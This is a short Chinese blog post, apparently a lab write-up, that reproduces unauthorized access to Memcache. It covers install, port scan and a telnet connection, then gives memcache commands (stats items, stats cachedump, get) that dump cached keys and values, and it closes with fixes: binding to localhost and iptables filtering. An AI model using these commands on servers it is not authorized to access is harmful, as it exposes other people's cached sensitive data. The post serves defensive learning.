Gridea

温故而知新

首页 归档 标签 关于

【漏洞复现】Memcache未授权访问

2022-05-21 1 min read # 漏洞复现 # memcache

memcache是一套常用的key-value缓存系统,由于其本身没有权限控制模块,所以开放在外网的memcache非常容易受到攻击,攻击者可以获取其内部的敏感信息。

漏洞复现

kali linux下,安装、启动

apt-get install memcached
memcached -d -m 128 -p 11211 -u root
image-20220521172540667

端口扫描可以扫出该端口

image-20220521172645025

通过telnet连接

telnet.exe 10.128.0.9 11211

一些命令

stats  //查看memcache 服务状态
stats items  //查看所有items
stats cachedump 32 0  //获得缓存key
get :state:264861539228401373:261588   //通过key读取相应value ,获得实际缓存内容,造成敏感信息泄露
image-20220521172937968

修复

  1. 如果没有在外网开放的必要,可以在memcache启动的时候指定绑定的ip地址为127.0.0.1
memcached -d -m 1024 -u root -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid
  1. 通过iptables进行访问控制,限制memcache端口的访问来源
Powered by Gridea RSS